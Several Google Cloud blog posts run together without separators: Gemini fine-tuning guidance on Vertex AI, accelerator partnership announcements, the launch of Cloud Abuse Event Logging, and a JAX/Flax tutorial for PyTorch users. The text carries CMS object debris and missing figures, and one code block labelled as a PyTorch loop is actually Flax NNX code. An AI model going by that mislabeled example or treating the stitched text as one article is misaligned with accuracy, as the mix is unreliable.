<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e009c6763d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
1. Establish a baseline and select your model
First, evaluate your foundation model on a representative dataset before fine-tuning to quantify improvements. This helps you understand its initial capabilities and identify areas for targeted improvement. Here are three key things to analyze:
Initial performance: Assess how the model performs without any training (zero-shot) and potentially with a few examples (few-shot).
Metrics: Select evaluation metrics aligned with your specific task, like exact match, BLEU or ROUGE.
Data: Ensure your evaluation dataset is diverse and representative of the real-world data the model will encounter.
Analyzing these baseline results, especially where the model struggles, is crucial for defining an effective fine-tuning strategy. When fine-tuning Gemini, you have a couple models to choose from:
Gemini 1.5 Pro:Google’s best model for general performance.
Gemini 1.5 Flash:Google’s model that is designed for cost-performance and low latency
Choosing the right model involves two key considerations:
Align the model with your use case: Before using SFT start with the model that most easily achieves your desired functionality. If your application requires high accuracy and complex reasoning, begin with Gemini Pro. If this works, then you can begin to look at cost. For example, you could try SFT on Flash, so that you have better latency and cheaper inference.
Efficiently improving the model with your data: Before fine-tuning a larger model like Gemini Pro, it’s often beneficial to test your tuning data on a smaller, less expensive model like Gemini Flash first. This allows you to verify that your data is actually improving the model’s performance. If the performance is not good enough you can always switch to a larger model. If your tuning data effectively improves the smaller model’s accuracy, then it indicates that your data has good quality, and there is a good chance that tuning the larger model with this data will be effective, too.
Consider your data
SFT isn’t just about throwing labeled data at a model; it’s a nuanced process where the right choices are crucial. To adapt a foundation model for specific tasks, we fine-tune it with a labeled dataset. This dataset contains inputs (like an earnings report) and their desired outputs (like a summary).
Machine learning thrives on data. The success of your supervised fine-tuning depends significantly on the quality of your tuning data. Here are some essential guidelines to follow.
Quality vs quantity
Quality vs. quantity in your training data is crucial. Vertex AI leverages Low-Rank Adaptation (LoRA) for efficient fine-tuning, freezing the original model weights and injecting trainable matrices to adjust model behavior effectively with a small number of trainable parameters. This means faster fine-tuning, fewer resources, and less reliance on massive datasets.
Focus on high-quality examples that are:
Relevant: Closely aligned with your specific fine-tuning task.
Diverse: Covering a wide range of potential inputs and scenarios.
Accurate: Featuring correct labels and outputs.
While more data can improve a model, it often needs fewer training epochs and at some point you might have diminishing returns. It’s not worth tuning on the same cluster over and over again.A smaller, refined and representative dataset often outperforms a large, noisy one. Small datasets have the risk of overfitting, so you may want to control your number of epochs. You can start with around 100 examples to validate the effectiveness of tuning. Then scale up to cover more corner cases or categories.
Data pre-processing
Pre-processing is a critical step in preparing data for supervised fine-tuning of large language models (LLMs). Research has shown that one of the most crucial pre-processing steps is deduplication. which involves identifying and removing duplicate data points. Duplicate examples in training data can lead to several issues: memorization, which hinders generalization; and inefficient training, as the model redundantly learns from similar clusters. Duplicate or near-duplicate examples between training and validation/test sets causes data leakage, artificially inflating performance.
For deduplication, leverage techniques like exact and fuzzy matching, and clustering. Tools like ExactSubstr deduplication can efficiently handle larger datasets. Furthermore, explore data augmentation to enhance data diversity and model robustness.
Be aware that pre-processing can also help with evaluating the performance of your fine-tuned model. For example you might want to deal with letter cases, remove extra whitespace and deal with punctuation.
2. Add instructions to your dataset
Including instructions in your fine-tuning dataset helps boost the performance. The model learns to condition its output on the given instructions, improving its ability to perform the desired task and generalize to similar, unseen instructions. Reducing the need for lengthy and complex prompts during inference. There are two primary methods: system instructions and text prompts, both are optional but can improve the performance.
System instructions provide global directives, shaping the overall response style. For example, "Answer in JSON format" enforces structured outputs, while "You are an expert in bioinformatics" sets the response domain. `.
Instance-level instructions offer example-specific guidance embedded within the model input. For instance, "Summarize the following research paper, focusing on the methodology and key findings:"directs the model to extract specific information.
Experimenting with different instruction styles, informed by resources like the Gemini prompting strategies, is important. You can experiment by prompting the Gemini model before adding the instruction to the dataset. Adding few-shot examples to your dataset will not give additional benefit. Crucially, ensure the prompts and instructions used in your fine-tuning dataset closely resemble those you plan to use in production. This alignment is vital for optimal performance.
Training-serving skew
A critical factor influencing fine-tuning effectiveness is the alignment between your tuning data and production data. Divergence in aspects like format, context, or example distribution can significantly degrade model performance. For instance, if your tuning data consists of formal language examples and your production data includes informal social media text, the model may struggle with sentiment analysis. To prevent this, carefully analyze your training and production data. Techniques like data augmentation and domain adaptation can further bridge the gap and enhance the model’s generalization capabilities in production.
Focus on complex examples
When fine-tuning, it’s tempting to throw all your data at the model and hope for the best. However, a more strategic approach focuses on examples that the base model finds difficult.
Instead, identify the specific areas where the model struggles. By curating a dataset of these challenging examples, you can achieve more significant improvements with less data. This targeted approach not only boosts performance but also makes your fine-tuning process more efficient. During the benchmarking process, analyze the model’s performance on a diverse dataset. Identify examples where the model struggles with specific tasks, formats, or reasoning abilities. Then add these examples to your training dataset and you might want to find extra examples and add those to your evaluation dataset to prevent leakage.
The importance of a validation dataset
Always incorporate a well-structured validation dataset into your fine-tuning process. This separate set of labeled data serves as an independent benchmark to evaluate your model’s performance during training, helping you to identify overfitting and choose the epochs to stop training at, and ensuring the model generalizes well to unseen data. The validation dataset should be representative of the real-world data that will be used during inference.
Data formatting
In supervised fine-tuning, the model learns from a labeled dataset of input-output pairs. To use SFT for Gemini your data needs to be in a specific format in a JSONL file. Adding instructions to your dataset helps guide the model during the fine-tuning process. You can add a systemInstruction and additional instructions to the contents fields, each containing role and parts to represent the conversation flow and content. You do this for each of the lines (sample) in your JSON file. For instance, a systemInstruction might specify the persona of the LLM, while the contents would include the user query and the desired model response. A well-structured dataset in the correct format is crucial for effective knowledge transfer and performance improvement during fine-tuning. Here’s an example (datapoint) of the required format for your dataset:
code_block
<ListValue: [StructValue([(‘code’, ‘{ “systemInstruction”: { “role”: “system”, “parts”: [ { “text”: “You are a helpful and harmless AI assistant.” } ] }, rn “contents”: [ rn { “role”: “user”, “parts”: [ { “text”: “What is the capital of France?” } ] }, rn { “role”: “model”, “parts”: [ { “text”: “The capital of France is Paris.” } ] } rn ] rn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e009c676850>)])]>
3. Hyperparameters and performance
When you start with fine-tuning it’s important to choose the right hyperparameters. Hyperparameters are the external configuration settings that govern the training process of a large language model which ultimately determine the model’s performance on a given task. When fine-tuning Gemini you can follow the guidance below to set the hyperparameters (epochs, learning rate multiplier and adapter size):
Gemini 1.5 Pro
Textfine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = 20, learning rate multiplier = 10,adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = 10, learning rate multiplier = default or 5,adapter size = 4.
Image fine-tuning: with a dataset size of ~1000 examplesstart with epochs = 15, learning rate multiplier = 5 and adapter size = 4. Increase the number of epochs when you have <1000 samples and decrease when you have >1000 examples.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Gemini 1.5 Flash
Textfine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = default, learning rate multiplier = 10 and adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = default, learning rate multiplier = default and adapter size = 8.
Image fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs >=15 (increase when you have less examples), learning rate multiplier = 5 and adapter size = 16. With a dataset size of >= 1000 examples or average context length >= 500, we recommend setting epochs <=15 (decrease when you have me examples), learning rate multiplier = default and adapter size = 4.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Audio use cases like Automated Speech Recognition (ASR) use cases might need a higher epochs setting to reach optimal results. Start with the settings mentioned above and based on your evaluation metrics you can increase the number of epochs.
After your initial run, iterate by adjusting the hyperparameters and closely monitoring key training and evaluation metrics. key training metrics. Two primary metrics to monitor during fine-tuning are:
Total loss measures the difference between predicted and actual values. A decreasing training loss indicates the model is learning. Critically, observe the validation loss as well. A significantly higher validation loss than training loss suggests overfitting.
Fraction of correct next step predictions measures the model’s accuracy in predicting the next item in a sequence. This metric should increase over time, reflecting the model’s growing accuracy in sequential prediction.
Monitor these metrics for both your training and validation datasets to ensure optimal performance depending on the task, consider other relevant metrics. To monitor your fine-tuning job, use the Google Cloud Console or Tensorboard. An “ideal” scenario for the metrics would be something like this:
Remember: These are just starting points. Experimentation is key to finding the optimal hyperparameters for your specific fine-tuning task.You might also want to follow some of the best steps below based on the performance of your fine-tuning experiment.
Suboptimal performance
How to spot this: Training loss and validation loss decrease as training progresses, but the validation loss does not converge or reach a minimum.
Possible causes:The training dataset may be too small or lack sufficient diversity to represent the real-world scenarios the model will encounter.
How to alleviate: Increase the number of epochs or the learning rate multiplier to speed up the training. If that doesn’t work you can gather more data.
Overfitting
How to spot this: During training, the training loss decreases consistently, but the validation loss decreases initially and then starts to increase. This divergence indicates that the model is learning the training data too well and is failing to generalize to new data.
Cause: The model has too much capacity (e.g., too many layers or parameters) relative to the size and complexity of the training data.
How to alleviate: Decrease the number of epochs to the point where validation loss reaches the minimum. Or Increase the effective size and diversity of the training data.
Potential data issues
How to spot this: The initial loss of training data is very high (>10) indicates that the model’s prediction is very far from the label.
Cause: There could be issues with your training dataset. One typical example is that the input length exceeds the maximum context length, which leads to truncation.
How to alleviate: Double check your training dataset to make sure it follows the best practice from the previous section.
Evaluate your model
Evaluating the performance of fine-tuned language models is crucial for understanding its performance, checkpoint selection and hyperparameter optimization. Evaluation can be challenging for generative models, as their outputs are often open-ended and creative. To gain a holistic understanding of performance, it’s best to combine different evaluation approaches, primarily utilizing a blend of auto-metrics and model-based evaluation, potentially calibrated with human evaluation.
Auto-metrics: These metrics provide quantitative measures by comparing the model’s output to a ground truth. While they may not capture nuanced aspects like factuality, they remain valuable due to their:
Speed: Auto-metrics are computationally inexpensive and fast to calculate.
Objectivity: They offer consistent, objective measurements, enabling reliable progress tracking and model comparisons.
Interpretability: Metrics like accuracy, F1 score, or BLEU are widely understood and provide readily interpretable results.
It’s crucial to select appropriate auto-metrics based on the task. For instance:
BLEU Score (translation and summarization): Measures n-gram overlap between generated and reference text, focusing on precision.
ROUGE (summarization): Evaluates n-gram overlap with an emphasis on recall.
Model-based metrics: These methods leverage a language model as a judge (Autorator) to assess the quality of generated output based on predefined criteria, aligning more closely with the task evaluation rubrics. For example, you might use model based evaluation to assess the factual accuracy or logical consistency of a response.
Human Evaluation: While human judgment remains the gold standard, its cost and scalability limitations make it less practical for continuous evaluation during fine-tuning. Instead, we can strategically use human evaluation to calibrate model-based evaluators (autoraters). This involves collecting a smaller but high-quality dataset of human judgments and training the autorater to mimic these judgments. We can then rely on the autorater during the tuning process and conduct a final round of validation with human raters to ensure the chosen checkpoint meets the desired quality standards.
What’s next?
Ready to get started? Dive into our Generative AI repository and explore notebooks like our how to use supervised fine tuning. Experience the transformative potential of SFT on Vertex AI, and tailor your AI applications for peak performance and customization.
Want to fine-tune a Gemini model? Head over to the Vertex AI documentation to see which ones you can customize.
If you want to learn more about Generative AI and fine-tuning please have a look at our 5-Day Gen AI Intensive Course.
A special thanks to May Hu, Yanhan Hou, Xi Xiong, Sahar Harati, Emily Xue and Mikhail Chrestkha from Google Cloud for their contributions.
At Google Cloud, we focus on building the most competitive and powerful network of support for startups. One of the ways we show our support is by partnering with investors, accelerators, and incubators to deliver the resources and benefits that help startups succeed.
For example, we are proud to partner with marquee institutions who invest in the next generation of founders like Y Combinator. We have also extended our network of partnerships to accelerators worldwide who support founders with mentorship, education, and in some cases, investment, such as ERA and AI2 Incubator.
In 2024, we worked with over 300 accelerators worldwide to help thousands of startups and over 3,000 founders build with Google. We’ve extended benefits to these startups including access to Startup Success Managers, Customer Engineers, and AI product teams, dedicated packages of credits, and technical programming like workshops and office hours.
Today, we’re proud to announce our latest partnerships with three more accelerators – Berkeley SkyDeck, Upekkha, and UnternehmerTUM – and highlight some of the companies we’re supporting through them.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e00b12d2790>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Introducing our latest accelerator partnerships
Berkeley SkyDeckis the only university accelerator partnering with a leading venture capital fund. Berkeley’s mission emphasizes long-term societal benefit, and prioritizes companies that align with this vision. Several SkyDeck companies are already running on Google Cloud, including:
Deeli AI, an AI-powered platform that helps companies discover and evaluate emerging technologies to make informed investment decisions. They currently build their product and data pipeline on various services such as GCE, Cloud Run, and Dataflow, and interact with models from the Vertex AI Model Garden.
ContextQA is Agentic AI for software testing, providing 12x the value by enabling accurate, user-centric test automation from day zero of development and helps to deliver bug-free product 40% faster. ContextQA uses Gemini models to continuously compare actual application behavior with expected behavior, adapting automatically to new changes for immediate agility.
T-Robotics provides pre-trained AI skills for robots that make commercial robots intelligent and robust. These skills are programmed through a conversational robot agent that leverages visual, haptic, action and language models – including Google Cloud’s Gemini – to seamlessly interpret and adapt to diverse industrial environments.
“Our partnership with Google Cloud enables startups to build better and faster, which is crucial for their success. Beyond the technology and services provided, we foster meaningful connections between our startups and Googlers, facilitating discussions on industry trends and innovations in AI.” – Taylor Marcus, Head of Business Development at Berkeley Skydeck
Upekkhahelps Indian founders build vertical AI companies that sell globally, with intense coaching, a network of founders, and capital. Google Cloud is partnering with them to support:
Outpost is a platform for AI/ML and data teams to train, fine tune, and deploy genAI models with managed infrastructure, tools, and workflows.
Labellerr‘s data labeling engine uses automated annotation, and smart QA, processing millions of images and thousands of hours of videos in just a few weeks using Google Vertex AI Integration and Cloud Run, which previously took months for ML teams.
Bynry’s SMART360 leverages Google Cloud’s robust infrastructure to empower small and mid-sized utilities to enhance operational efficiency and customer satisfaction.
“Google Cloud has technology that just works. You can tell they actually listen to developers. They don’t just give out credits; they help founders understand how to use their technology.” – Thiyagarajan Maruthavanan (Rajan) – Managing Partner, Upekkha
UnternehmerTUMis the leading center for innovation and business creation in Europe with more than 50 high-growth technology start-ups every year, and offers complete service from initial idea to IPO. Startups supported by them include:
Kraftblock’s innovative technology offers unparalleled large-scale, long-duration energy storage, empowering industries to transition towards sustainable thermal processes. The green tech company is using Google’s Compute Engine to power their simulations.
tulanā’s highly customizable platform uses forecasting, optimization, simulation and AI to help enterprise clients take better decisions across their supply chains. tulanā is using Google Cloud Run to horizontally scale its optimization workloads, Google’s Gemini model for intelligent ETL processes, and Cloud SQL and Big Query to store customer data.
SE3 Labs specializes in 3D computer vision and AI. They develop advanced technologies to create “Spatial GPTs,“ which are essentially AI models that can understand and interact with the world in 3D. The startup loves using Google Cloud Run for their deployment.
“We chose to partner with Google Cloud because their innovation-driven approach aligns closely with our mission to empower high-tech startups. Google Cloud’s advanced infrastructure, AI, and data analytics capabilities offer exceptional tools that support our founders in building robust, scalable solutions, from market entry to growth.”– Barbara Mehner, Managing Partner at XPRENEURS by UnternehmerTUM
Building on a history of support with accelerators
These new partnerships expand on our existing work with accelerators to help bring leading cloud, AI models, and AI-optimized infrastructure to the companies they support. These include:
500 Global is a multi-stage venture capital firm. Its investments and flagship accelerator help founders with access to a supportive global network of those who’ve successfully built startups before. Notable alumni include Intercom, Talkdesk, Innovaccer, Babylist and Solana.
Techstars provides individualized care with its small cohort size and mentor-driven approach across more than 30 cities worldwide.
Antler is a global early-stage VC that operates in 30 cities across major entrepreneurial hubs, with a proven process to back founders from pre-seed to Series C. Their flagship Residency Program empowers founders to find the right co-founders, validate and build ideas rapidly, and secure funding to launch and scale impactful ventures.
StartX is the non-profit startup community, accelerator, and fellowship program for over 2,500 Stanford University founders, offering support without requiring equity.
Plug and Play operates over 100 accelerator programs globally, accelerating more than 2,500 startups annually. Its portfolio includes over 30 unicorns and a network of 90,000 startups worldwide. They offer mentorship and access to a vast network of investors and industry leaders.
Gener8toroffers 75 programs globally, each with a highly selective, concierge-level experience startups that are selected.
MassChallengestands out as an impact-focused, zero-equity accelerator, which allows startups to receive world-class support without giving up any ownership.
IIT Madras Incubation Cell is deeply integrated with India’s top engineering institute and provides a unique ecosystem that nurtures R&D-driven, deep-tech startups.
nasscom GenAI Foundryoffers Indian GenAI startups access to GPU resources, fundraising, paid pilot and showcase opportunities, enablement on go-to-market, technology, Responsible AI, and intellectual property, through a network of 3,500+ industry members and subject matter experts.
Lanzadera is a prominent accelerator in Spain, unique in its adoption of a management model that drove its founder’s success in business, and its close collaboration with the business school EDEM and investment fund Angels, creating a flywheel of innovation.
We’re excited about all of the opportunities that will come from these new partnerships, as well as the increasing value of relationships we have with other accelerators. All of these programs and strategies illustrate our ever-expanding commitment to founders and startups that stand on the front lines of innovation.
Learn more
Companies who work with these accelerators should reach out to their accelerator Program Manager to learn more about getting started with Google Cloud.
At Google Cloud, we are deeply committed to partnering with our customers to help achieve stronger security outcomes.
As a part of this commitment, we’re excited to announce that Google Cloud customers can now track Cloud Abuse Events using Cloud Logging. These events can include leaked service account keys, crypto mining incidents, and malware.
When we identify one of these abuse issues that’s affecting your cloud resources, you’ll now receive two detailed notifications: one in a structured log format, and an email notification.
Cloud Abuse Event Logging is focused on providing a more efficient and effective method for customers to receive important abuse and security notifications. Previously, notifications were sent to customers only in an email, which at times created challenges around consistency, automation, and continuity.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3eea113e8b80>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
In response to customer feedback, we developed Cloud Abuse Event Logging to help supplement email notifications. By leveraging these log notifications, customers can consume these logs and develop consistent automated processes to resolve abuse and security issues more efficiently and effectively. Here are few benefits:
Direct access in Cloud Logging: These notifications are readily available as logs in Cloud Logging, making them easier to find and manage.
Enhanced automation: The structured log format allows you to integrate these notifications into your existing security monitoring and incident response systems, which can help reduce the time it takes to address potential threats.
Historical trend analysis: Gain insights into past abuse events to identify patterns and proactively strengthen your security measures.
Dashboard built on top of Cloud Abuse Event logs using Cloud Logging.
A Cloud Abuse Event log in Logs Explorer for CRYPTO_MINING.
This new logging system reinforces our commitment to our customers, aligns with our shared fate model, and makes Google Cloud more secure. Cloud Abuse Events are provided on a best-effort basis to assist you in identifying potential abuse and we encourage you to combine these notifications with your own security practices for comprehensive protection.
Monitoring and dashboarding
This new integration of Cloud Abuse Events with Cloud Logging helps you strengthen your security with automated and timely notifications. You can use Cloud Monitoring to observe trends in your logs and notify you when specific conditions are met, such as receiving important types of abuse events. For example, based on the logs provided via Cloud Abuse Events, you can configure an alerting policy to notify you whenever we’ve become aware that your service account key has been leaked to the public.
You can also set up custom dashboards for your logs to get insights into the overall health and security of your environment. Cloud Abuse Events in Cloud Logging gives you many flexible options to effectively manage your security and monitoring. For example, if you’d like to aggregate the logs from each project in one place, an aggregate sink at the organization level may be useful. Additionally, you can use Log Analytics to run queries that analyze your log data, which allows you to easily chart and query results and can help uncover patterns and trends in your logs.
Automate response to abuse events
There are several ways to detect and respond to Cloud Logging events in real-time. For example, if you would like to configure automated deprovisioning of a VM after cryptomining has been detected on the instance, you can follow these steps:
Create a Logging sink to direct crypto mining related Abuse Events to your business logic. You can use the following filters to isolate these logs:
Create a Pub/Sub topic. The Logging sink will route the filtered Abuse Events to this topic. It initiates Cloud Functions asynchronously based on the Abuse Events via a Pub/Sub message.
You can ingest Cloud Abuse Event logs into Google Security Operations which lets you store, search, and examine aggregated security information for your enterprise. If you prefer to export your abuse logs to an external security information and event management system (SIEM) for further analysis or custom automation, you’ll need to route your logs to a supported destination, such as a Google Cloud Storage bucket or a Pub/Sub topic that can provide support for third-party integrations.
You can learn more about responding to abuse notifications and warnings by visiting our documentation. For technical information about our Cloud Abuse Event log payload format, please click here.
Like many PyTorch users, you may have heard great things about JAX — its high performance, the elegance of its functional programming approach, and its powerful, built-in support for parallel computation. However, you may have also struggled to find what you need to get started: a straightforward, easy-to-follow tutorial to help you understand the basics of JAX by connecting its new concepts to the PyTorch building blocks that you’re already familiar with. So, we created one!
In this tutorial, we explore the basics of the JAX ecosystem from the lens of a PyTorch user, focusing on training a simple neural network in both frameworks for the classic machine learning (ML) task of predicting which passengers survived the Titanic disaster. Along the way, we introduce JAX by demonstrating how many things — from model definitions and instantiation to training — map to their PyTorch equivalents.
As a PyTorch user, you might initially find Jax’s highly modularized ecosystem to be quite different than what you are used to. JAX focuses on being a high-performance numerical computation library with support for automatic differentiation. Unlike with PyTorch, it does not try to have explicit built-in support for defining neural networks, optimizers, etc. Instead, JAX is designed to be flexible, allowing you to bring in your frameworks of choice to add to its functionality.
In this tutorial, we use the Flax Neural Network library and the Optax optimization library — both very popular, well-supported libraries. We show how to train a neural network in the new Flax NNX API for a very PyTorch-esque experience, and then show how to do the same thing with the older, but still widely-used Linen API.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eea10fd1b80>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Functional programming
Before we dive into our tutorial, let’s talk about JAX’s rationale for using functional programming, as opposed to the object-oriented programming that PyTorch and other frameworks use. Briefly, functional programming focuses on pure functions that cannot mutate state and cannot have side effects, i.e., they always produce the same output for the same input. In JAX, this manifests through significant usage of composable functions and immutable arrays.
The predictability of pure functions and functional programming unlocks many benefits in JAX, such as Just-In-Time (JIT) compilation, where the XLA compiler can significantly optimize code on GPUs or TPUs, for major speed-ups. Moreover, they also make sharding and parallelizing operations much easier in JAX. You can learn more from the official JAX tutorials.
Do not be deterred if you’re new to functional programming — as you will soon see, Flax NNX hides much of it behind standard Pythonic idioms.
Data loading
Data loading in JAX is very straightforward — just do what you already do in PyTorch. You can use a PyTorch dataset/dataloader with a simple collate_fn to convert things to the Numpy-like arrays that underlie all JAX computation.
With Flax’s NNX API, defining your neural networks is very similar to doing so in PyTorch. Here we define a simple, two-layer multilayer perceptron in both frameworks, starting with PyTorch.
code_block
<ListValue: [StructValue([(‘code’, ‘import torch.nn as nnrnrnclass TitanicNeuralNet(nn.Module):rn def __init__(self, num_hidden_1, num_hidden_2):rn super().__init__()rn self.linear1 = nn.Linear(8, num_hidden_1)rn self.dropout = nn.Dropout(0.01)rn self.relu = nn.LeakyReLU()rn self.linear2 = nn.Linear(num_hidden_1, num_hidden_2)rn self.linear3 = nn.Linear(num_hidden_2, 1, bias=False)rnrn def forward(self, x):rn x = self.linear1(x)rn x = self.dropout(x)rn x = self.relu(x)rn x = self.linear2(x)rn x = self.dropout(x)rn x = self.relu(x)rn out = self.linear3(x)rn return out’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd1ca0>)])]>
NNX model definitions are very similar to the PyTorch code above. Both make use of __init__ to define the layers of the model, while __call__ corresponds to forward.
code_block
<ListValue: [StructValue([(‘code’, ‘from flax import nnxrnrnclass TitanicNNX(nnx.Module):rn def __init__(self, num_hidden_1, num_hidden_2, rngs: nnx.Rngs):rn self.linear1 = nnx.Linear(8, num_hidden_1, rngs=rngs)rn self.dropout = nnx.Dropout(0.01, rngs=rngs)rn self.relu = nnx.leaky_relurn self.linear2 = nnx.Linear(num_hidden_1, num_hidden_2, rngs=rngs)rn self.linear3 = nnx.Linear(num_hidden_2, 1, use_bias=False, rngs=rngs)rnrn def __call__(self, x):rn x = self.linear1(x)rn x = self.dropout(x)rn x = self.relu(x)rn x = self.linear2(x)rn x = self.dropout(x)rn x = self.relu(x)rn out = self.linear3(x)rn return out’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd1e80>)])]>
Model initialization and usage
Model initialization in NNX is nearly identical to PyTorch. In both frameworks, when you instantiate an instance of the model class, the model parameters are eagerly (vs. lazily) initialized and tied to the instance itself. The only difference in NNX is that you need to pass in a pseudorandom number generator (PRNG) key when instantiating the model. In keeping with Jax’s functional nature, it avoids implicit global random state, requiring you to explicitly pass PRNG keys. This makes PRNG generation easily reproducible, parallelizable, and vectorizable. See the JAX docs for more details.
There are some key differences in training loops between PyTorch and Flax NNX. To demonstrate, let’s build up to the full NNX training loop step by step.
In both frameworks, we create Optimizers and have the flexibility to specify our optimization algorithm. While PyTorch requires passing in model parameters, Flax NNX allows you to just pass in the model directly and handles all interactions with the underlying Optax optimizer.
Perhaps the biggest difference between PyTorch and JAX is how to do a full forward/backward pass. With PyTorch, you calculate the gradients with loss.backward(), triggering AutoGrad to follow the computation graph from loss to compute the gradients.
JAX’s automatic differentiation is instead much closer to the raw math, where you have gradients of functions. Specifically, nnx.value_and_grad/nnx.grad take in a function, loss_fn, and return a function, grad_fn. Then, grad_fn itself returns the gradient of the output of loss_fn with respect to its input.
In our example, loss_fn is doing exactly what is being done in PyTorch: first, it gets the logits from the forward pass and then calculates the familiar loss. From there, grad_fn calculates the gradient of loss with respect to the parameters of model. In mathematical terms, the grads that are returned are ∂J/∂θ. This is exactly what is happening in PyTorch under the hood: whereas PyTorch is “storing” the gradients in the tensor’s .grad attribute when you do loss.backward(), JAX and Flax NNX follow the functional approach of not mutating state and just return the gradients to you directly.
In PyTorch, optimizer.step() updates the weights in place using the gradients. NNX also does an in-place update of the weights, but requires the grads you calculated in the backward pass to be passed in directly. This is the same optimization step that is done in PyTorch, just slightly more explicit — in keeping with Jax’s underlying functional nature.
Full training loop
You now have everything you need to construct a full training loop in JAX/Flax NNX. As a reference, let’s first see the familiar PyTorch loop:
<ListValue: [StructValue([(‘code’, ‘import optax rnrndef train(model, train_dataloader, eval_dataloader, num_epochs):rn optimizer = nnx.Optimizer(model, optax.adam(learning_rate=0.01))rnrn for epoch in (pbar := tqdm(range(num_epochs))):rn pbar.set_description(f”Epoch {epoch}”)rn model.train()rn for batch in train_dataloader:rn train_step(model, optimizer, batch)rnrn pbar.set_postfix(train_accuracy=eval(model, train_dataloader), eval_accuracy=eval(model, eval_dataloader))rnrn@nnx.jitrndef train_step(model, optimizer, batch):rn def loss_fn(model):rn logits = model(batch[0])rn loss = optax.sigmoid_binary_cross_entropy(logits.squeeze(),batch[1]).mean()rn return lossrn grad_fn = nnx.value_and_grad(loss_fn)rn loss, grads = grad_fn(model)rn optimizer.update(grads)rnrndef eval(model, eval_dataloader):rn model.eval()rn total = 0rn num_correct = 0rn for batch in eval_dataloader:rn res = eval_step(model, batch)rn total += res.shape[0]rn num_correct += jnp.sum(res)rn return num_correct / totalrnrn@nnx.jitrndef eval_step(model, batch):rn logits = model(batch[0])rn logits = logits.squeeze()rn preds = jnp.round(nnx.sigmoid(logits))rn return preds == batch[1]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd2340>)])]>
The key takeaway is that the training loops are very similar between PyTorch and JAX/Flax NNX, with most of the differences boiling down to object-oriented versus functional programming. Although there’s a slight learning curve to functional programming and thinking about gradients of functions, it enables many of the aforementioned benefits in JAX, e.g., JIT compilation and automatic parallelization. For example, just adding the @nnx.jit annotations to the above functions speeds up training the model for 500 epochs from 6.25 minutes to just 1.8 minutes with a P100 GPU on Kaggle! You’ll see similar speedups with the same code across CPUs, TPUs, and even non-NVIDIA GPUs.
Flax Linen reference
As previously mentioned, the JAX ecosystem is very flexible and lets you bring in your framework of choice. Although NNX is the recommended solution for new users, the Flax Linen API is still widely used today, including in powerful frameworks like MaxText and MaxDiffusion. While NNX is far more Pythonic and hides much of the complexity of state management, Linen adheres much more closely to pure functional programming.
Being comfortable with both is greatly beneficial if you want to participate in the JAX ecosystem. To help, let’s replicate much of our NNX code with Linen, and include comments highlighting the main differences.
code_block
<ListValue: [StructValue([(‘code’, ‘# Model definitionrnrn# Input dimensions for relevant layers are inferred during init below rnclass TitanicNeuralNet(nn.Module):rn num_hidden_1: intrn num_hidden_2: intrnrn def setup(self):rn self.linear1 = nn.Dense(features=self.num_hidden_1, kernel_init=initializer)rn self.linear2 = nn.Dense(features=self.num_hidden_2, kernel_init=initializer)rn self.linear3 = nn.Dense(features=1, use_bias=False, kernel_init=initializer)rn self.dropout1 = nn.Dropout(0.01)rn self.dropout2 = nn.Dropout(0.01)rnrn def __call__(self, x, training):rn x = self.linear1(x)rn x = self.dropout1(x, deterministic=not training)rn x = nn.leaky_relu(x)rn x = self.linear2(x)rn x = self.dropout2(x, deterministic=not training)rn x = nn.leaky_relu(x)rn x = self.linear3(x)rn return x’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd23a0>)])]>
code_block
<ListValue: [StructValue([(‘code’, “# Model Initrnrn# Params are independent of the model definition and init requires sample data for shape inference rnrng = jax.random.PRNGKey(42)rnnew_rng, subkey, subdropout = jax.random.split(rng, num=3)rnflax_model = TitanicNeuralNet(num_hidden_1=32, num_hidden_2=16)rnparams = flax_model.init(subkey, sample_data, True)rnrn# Model is called using apply, and both params and data must be passed in, in very functional programming style. Similarly, you distinguish between train/eval with a boolean and pass in PRNGrnflax_model.apply(params, sample_data, True, rngs={‘dropout’: subdropout})”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd2400>)])]>
code_block
